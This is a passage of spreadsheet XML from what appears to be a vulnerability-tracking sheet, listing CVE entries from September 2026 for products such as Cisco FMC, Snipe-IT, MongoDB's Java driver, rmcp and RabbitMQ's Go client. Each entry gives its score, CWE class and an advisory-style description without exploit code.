      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr"/>
      <c r="Q358" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91102</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20323</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="inlineStr"/>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr"/>
      <c r="Q359" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the sftunnel inter-device communication protocol of Cisco Secure FMC Software and Cisco Secure FTD Software could allow an unauthenticated, adjacent attacker to impersonate the peer device and obtain access at the level of the&amp;nbsp;manager role, which is equivalent to root.
This vulnerability is due to improper management of the TLS certificate for the sftunnel management connection. An attacker could exploit this vulnerability by connecting to the sftunnel port using a crafted TLS certificate. A successful exploit could allow the attacker to become a registered sftunnel peer with root access.
Note: The attack is successful only if the sftunnel connection is down or the attack can disrupt the sftunnel connection long enough to execute the attack.</t>
        </is>
      </c>
      <c r="S359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20323</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69646</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr"/>
      <c r="Q360" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Skype for Business allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="S360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69646</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86771</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr"/>
      <c r="Q361" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to HTML-escape the employee_num field in the acceptance PDF generator, allowing attackers with users.edit permission to inject img tags into TCPDF's writeHTML() function. Attackers can craft a malicious employee_num value containing an img tag with an arbitrary HTTP(S) URL to trigger server-side requests to internal services, cloud metadata endpoints, or external targets when a victim signs an asset acceptance.</t>
        </is>
      </c>
      <c r="S361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86771</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87034</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr"/>
      <c r="Q362" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a SQL injection vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87034</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88033</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K363" s="5" t="inlineStr">
        <is>
          <t>mongodb:java_driver</t>
        </is>
      </c>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr"/>
      <c r="Q363" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in data query logic in the GridFS component of the MongoDB Java Driver can cause a caller-supplied structured file identifier to be interpreted as a query condition rather than as a literal identifier. An authenticated user who can influence the identifier passed by an affected application may obtain stored file content beyond the intended target or cause all GridFS file chunks in the affected bucket to be removed, rendering stored file content unreadable. The affected rename operation may also rename a stored file other than the intended target.</t>
        </is>
      </c>
      <c r="S363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88033</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92467</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="inlineStr"/>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr"/>
      <c r="Q364" s="5" t="inlineStr">
        <is>
          <t>CWE-620</t>
        </is>
      </c>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>zlt2000 microservices-platform through 6.0.0 contains an unverified password change vulnerability in the PUT /users/password endpoint that allows authenticated users to change any account password by omitting the current password check. Attackers can supply an arbitrary user id in the request body and a new password to overwrite credentials of any non-administrator account without verification.</t>
        </is>
      </c>
      <c r="S364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92467</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92752</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="inlineStr"/>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr"/>
      <c r="Q365" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>metasfresh DocumentAttachmentsRestController and CommentsRestController endpoints check only that callers are logged in without enforcing record-level permissions. Attackers can enumerate sequential document identifiers to read, replace, and delete attachments and comments on records their role cannot access.</t>
        </is>
      </c>
      <c r="S365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92752</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17467</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr"/>
      <c r="Q366" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>IBM Cloud Pak for Data System (Yosemite 1.0) 3.0.5.2 could allow a remote attacker to obtain sensitive information due to the use of weak or deprecated cryptographic protocols.</t>
        </is>
      </c>
      <c r="S366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17467</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57132</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr"/>
      <c r="Q367" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to 4.6.62, setting PRAISONAI_CALL_AUTH to disabled makes verify_token accept requests to /api/v1/agents/{id}/invoke without CALL_SERVER_TOKEN authentication. Deployments that use the application's advertised opt-out can expose registered agents and their connected tools or private context to unauthenticated invocation. The vulnerability is fixed in 4.6.62.</t>
        </is>
      </c>
      <c r="S367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57132</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63127</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="inlineStr"/>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr">
        <is>
          <t>rust:rmcp</t>
        </is>
      </c>
      <c r="M368" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr"/>
      <c r="Q368" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>RMCP is an official Rust SDK for the Model Context Protocol. Prior to 2.0.0, the rmcp crate's OAuth implementation in crates/rmcp/src/transport/auth.rs omits the RFC 9728 resource field from ResourceServerMetadata and allows discover_oauth_server_via_resource_metadata to use protected-resource metadata without confirming that the returned resource identifier exactly matches the configured MCP server. A malicious MCP server can publish metadata for a different legitimate MCP resource and its authorization server, causing a victim who connects and completes the authorization flow to obtain a legitimate access token that the client subsequently sends to the malicious server. The attacker can capture the token and impersonate the victim against the legitimate MCP resource within the token's granted scopes. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="S368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63127</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65838</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr"/>
      <c r="Q369" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>Skipper is an HTTP router and reverse proxy for service composition. Prior to 0.27.35, the opaAuthorizeRequestWithBody filter in filters/openpolicyagent/openpolicyagent.go can allow an oversized declared Content-Length request to bypass a deny-on-presence Rego policy because ExtractHttpBodyOptionally leaves OPA with an empty parsed_body while forwarding the complete request body upstream. This incomplete remediation of CVE-2026-50197 affects deployments that authorize request-body content and exceed -open-policy-agent-max-request-body-size, which defaults to 1 MB. Policy logic that does not reject input.attributes.request.http.truncated_body can therefore fail open and permit a forbidden payload to reach the protected service, while small bodies and the previously fixed chunked-body case are evaluated normally. This issue is fixed in version 0.27.35.</t>
        </is>
      </c>
      <c r="S369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65838</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71180</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="inlineStr"/>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr"/>
      <c r="Q370" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>Dell Update Package Framework, versions prior to 26.07.03, contains an Unchecked Return Value vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="S370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71180</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76413</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr"/>
      <c r="Q371" s="5" t="inlineStr">
        <is>
          <t>CWE-1259</t>
        </is>
      </c>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Adaptive Security Device Manager (ASDM) single sign-on (SSO) handler for Cisco Secure FMC Software could allow an unauthenticated, remote attacker to log in as the Cisco ASDM administrator user.
This vulnerability is due to improper management of the Cisco ASDM SSO token. An attacker could exploit this vulnerability by performing session token forgery techniques. A successful exploit could allow the attacker to log in as the administrator user and, by repeating this action, keep legitimate administrators locked out of the ASDM indefinitely.</t>
        </is>
      </c>
      <c r="S371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76413</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77406</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="inlineStr"/>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr"/>
      <c r="Q372" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, Channel.Qos in channel.go accepts negative prefetchCount and prefetchSize integers and casts them directly to uint16 and uint32 fields in the basic.qos method because validateQos is absent. Values such as -1 therefore wrap to 65535 or 4294967295 instead of being rejected. An application that permits untrusted configuration of these Qos values can unintentionally request extremely large prefetch limits, allowing a broker to deliver enough queued messages to exhaust client memory and disrupt processing. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77406</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77409</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="inlineStr"/>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr"/>
      <c r="Q373" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, Channel.dispatch in channel.go, confirms.confirm in confirms.go, and Connection.dispatch0 in connection.go synchronously send publisher confirmations, flow-control events, consumer cancellations, returned messages, including NotifyConfirm events and connection block notifications, to application-provided channels. If a listener channel is unbuffered, full, or not drained promptly, the sole reader goroutine blocks and stops processing frames, acknowledgments, deliveries, and heartbeats. Broker-driven event bursts can therefore cause connection stalls, missed heartbeats, deadlocks, and disconnection. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77409</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78252</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
